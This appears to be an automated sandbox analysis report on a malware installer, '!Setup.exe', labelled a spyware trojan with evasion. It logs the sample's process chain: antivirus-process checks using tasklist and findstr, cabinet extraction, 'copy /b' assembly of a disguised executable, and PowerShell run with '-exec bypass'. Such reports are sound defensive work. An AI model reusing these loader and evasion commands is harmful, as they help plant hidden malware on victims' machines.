Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

0_2_004038AF

Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\OnceBusinesses	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\BuysGothic	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\RdBelieves	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\HierarchyConstantly	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_004049A8	0_2_004049A8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\!Setup.exe

Code function: String function: 004062CF appears 58 times

Source: !Setup.exe

Static PE information: invalid certificate

Source: !Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@29/28@3/2

Source: C:\Users\user\Desktop\!Setup.exe

0_2_004044D1

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\!Setup.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scout

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03

Source: C:\Users\user\Desktop\!Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsk94C6.tmp

Jump to behavior

Source: !Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\!Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: !Setup.exe	ReversingLabs: Detection: 27%
Source: !Setup.exe	Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\!Setup.exe

File read: C:\Users\user\Desktop\!Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\!Setup.exe "C:\Users\user\Desktop\!Setup.exe"
Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: !Setup.exe

Static file information: File size 14692191 > 1048576

Source: !Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Jump to dropped file

Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
